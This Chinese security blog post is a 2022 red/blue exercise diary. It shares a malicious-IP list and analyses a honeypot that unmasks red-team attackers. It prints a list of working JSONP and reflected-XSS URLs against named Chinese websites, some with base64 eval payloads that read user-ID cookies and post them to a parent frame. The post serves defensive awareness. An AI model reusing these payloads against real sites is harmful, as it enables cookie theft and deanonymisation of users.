杂谈

今天的分享分为三部分

恶意IP/域名情报
一些厂商漏洞汇总
你关心的趣事

恶意IP/域名情报

图片[1]-2022护网日记第三天-FancyPig's blog — 共计1723个IP（223.5.5.5误报的IP已删除）

纰漏补充：其中223.5.5.5为阿里云公网DNS，情报来源是天眼黑名单IP（现在更新已删掉此IP）

立即预览立即下载

一些厂商漏洞汇总

隐藏内容，输入密码后查看

接到相关要求，现已隐藏漏洞相关内容，更多精彩可以关注我们的微信公众号

你关心的趣事？

如何通过蜜罐完成溯源？可以直接通过蜜罐拿到攻击者的手机号！

《一种针对红队的新型溯源手段》

这个蜜罐的溯源方式针对使用手机热点的红队人员。蜜罐直接获取攻击者手机号进行溯源。一抓一个准。各位红队人员小心为妙。

首先打开网站，他会监控是否开启了F12控制台，如果开启了调试模式的话，溯源代码会停止加载。

另外，针对使用burp的用户。小心你们的burp版本是否存在chrome的漏洞。

沙箱的特征如下，直接加载js

fofa上面可以直接搜索到142多条，看来蜜罐还挺多啊

重点获取手机号js代码，可以看到会获取三大运营商的手机信息

解密如下

获取联通的接口

如果获取到手机号码的话，会将加密的手机号上传

另外其他溯源接口如下

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.4515320024420155

https://bbs.zhibo8.cc/user/userinfo?device=pc&_=1584613345023&callback=jcbDNoDtQbW&callback=callback_165893378313192912

https://myjr.suning.com/sfp/mutualTrust/getLoginInfo.htm?callback=getphone

https://myjr.suning.com/sfp/headPic/getEgoMemberHeadPicUrl.htm

https://ajax.58pic.com/58pic/index.php?m=adManageSystem&a=showAdDeliveryForPosition&callback=%3Cscript%3Eeval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoicWlhbnR1IiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgicXRfdWlkIil9fSwnKicpOw==%27))%3C/script%3E&position=31&keyword=XXX&_=1590829943379

https://my.zol.com.cn/public_new.php

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.04630644674906281

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.38244545320223655

http://my.zol.com.cn/public_new.php

https://loginst.suning.com/authStatus?callback=getuid

https://www.fhyx.com/account/login.html?redirecturl=%22%3E%3CSCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/SCrIpT%3E

https://so.u17.com/all/%22%3C/span%3E%250a%3Cimg%2520src=1%20onerror=%22document.body.innerHTML=location.search;document.body.innerHTML=document.body.innerText;%22%3E%250a%22/m0_p1.html?<img/src="x"/onerror=a=eval;a(atob(unescape(location.hash.slice(1))))>

https://i.vip.iqiyi.com/client/store/pc/checkout.action?platform=b6c13e26323c537d&fs=&fsSign=&fc=&fv=&qc005=&P00001=&pid=adb3376b039b970b&vipType=2&aid=&device_id=&callback=callback_165893378307001282

https://login.sina.com.cn/sso/login.php?client=&service=&client=&encoding=&gateway=1&returntype=TEXT&useticket=0&callback=sina2&_=1577938268947&callback=callback_165893378307919803

https://v-api-plus.huya.com/jsapi/getUserInfo?callback=jQuery1111007865243652615272_1628490347897&_=1628490347898&callback=callback_165893378306693233

http://mapp.jrj.com.cn/pc/content/getMqNews?vname=%3Csvg%20onload=eval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoianJqIiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgibXlqcmpfdXNlcmlkIil9fSwnKicpOw==%27))%3E

https://www.ixueshu.com/index.html?v=1608893853571&template=sys_login_ajax.html&_url=123123123%22%22%3E%3CsCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/sCrIpT%3E

https://hackit.me/v.qq.com/

https://api.csdn.net/oauth/authorize?client_id=1000001&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type=%22https%3A%2F%2Fapi.csdn.net%2Foauth%2Fauthorize%3Fclient_id%3D1000001%26redirect_uri%3Dhttp%3A%2F%2Fwww.iteye.com%2Fauth%2Fcsdn%2Fcallback%26response_type%3D%22%3E%3Cimg%20src%3Dx%20onerror%3Deval(window.name)%3E

红队IP溯源？地址都爆出来了？

有热心网友进行了溯源，然后找到了红队的相关地址😊

如何通过恶意攻击IP溯源

11个月前

1000976594

🎣钓鱼的正确打开方式？

热心网友的护网日记

当然是看热心网友写日记了

甲方看我的眼神如同在动物园看猴子一样

夜间值守有什么需要注意的？一定要备颗速效救心丸！

刚才看到热搜上22岁女孩连续熬夜加班猝死……

看抖音上也热搜了，大家熬夜加班一定要注意，尽可能不要连续熬夜！身体健康最重要！

相关声明 1 微信公众号：猪猪安全
2 本站永久网址：https://www.iculture.cc
3 本文内容仅为技术科普，请勿用于非法用途
4 本文内容未隐讳任何个人、群体、公司。非文学作品，请勿用于阅读理解的练习
5 根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途
6 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责

THE END

评论共18条

请登录后发表评论

登录注册

只看作者

- 雨沫0
  想问一下隐藏内容，怎么获取密码
  9个月前回复
- - zhizhizhi0
    +1
    9个月前@雨沫回复
- Felix Lee0
  又来学习了
  9个月前回复
- 墨墨0
  滴！猪头粉丝卡！打卡时间：21:57:07，请上车的乘客系好安全带~
  10个月前回复
- csctyu0
  回复一下，看看能发生什么
  10个月前回复
- - FancyPig作者0
    没有隐藏内容，但是作者会回复你
    10个月前@csctyu回复
- aqww5200
  滴！猪头粉丝卡！打卡时间：13:46:41，请上车的乘客系好安全带~
  10个月前回复
- 洛清风0
  真不错，这样每天都能关注最新情报了
  10个月前回复
- honest-润^0
  猪哥，请问咱这个汉堡会员一对一是有助教随时解决不会的问题吗，前面打错了
  10个月前回复
- - FancyPig作者0
    无法保证随时哦个人时间有效，只能说在线的情况下，个人能力范围内的可以帮忙看看。
    10个月前@honest-润^回复
  - - honest-润^0
      猪哥，你看我能申请加群吗
      10个月前@FancyPig回复
    - - FancyPig作者0
        可以，送了你个会员，你看下这个链接 https://iculture.cc/vip_info
        10个月前@honest-润^回复
      - honest-润^0
        谢谢猪哥
        10个月前@FancyPig
- honest-润^0
  猪哥，请问咱这个披萨会员一对一是有助教随时解决不会的问题吗
  10个月前回复
- Rem ㅤ0
  猪猪，活着
  10个月前回复
- Rico0
  滴！猪头粉丝卡！打卡时间：09:18:26，请上车的乘客系好安全带~
  10个月前回复